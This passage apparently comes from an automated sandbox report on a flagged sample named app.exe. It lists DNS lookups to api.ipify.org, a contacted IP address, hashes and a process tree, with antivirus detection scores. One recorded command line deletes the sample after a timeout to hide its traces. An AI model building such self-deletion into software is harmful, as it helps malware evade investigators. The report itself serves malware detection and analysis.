                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                          May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                          May 5, 2024 00:24:47.899873972 CEST1.1.1.1192.168.11.200x3613No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • api.ipify.org
                                                                                                                                          • 144.208.127.230

                                                                                                                                          Statistics

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:00:23:27
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Users\user\Desktop\app.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'290'240 bytes
                                                                                                                                          MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:00:23:27
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7cb400000
                                                                                                                                          File size:875'008 bytes
                                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:00:24:07
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'290'240 bytes
                                                                                                                                          MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          • Detection: 11%, ReversingLabs
                                                                                                                                          • Detection: 11%, Virustotal, Browse
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:00:24:07
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7cb400000
                                                                                                                                          File size:875'008 bytes
                                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:00:25:08
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
                                                                                                                                          Imagebase:0x90000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:00:25:08
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7cb400000
                                                                                                                                          File size:875'008 bytes
                                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:00:25:08
                                                                                                                                          Start date:05/05/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:timeout /t 5
                                                                                                                                          Imagebase:0xd40000
                                                                                                                                          File size:25'088 bytes
                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          No disassembly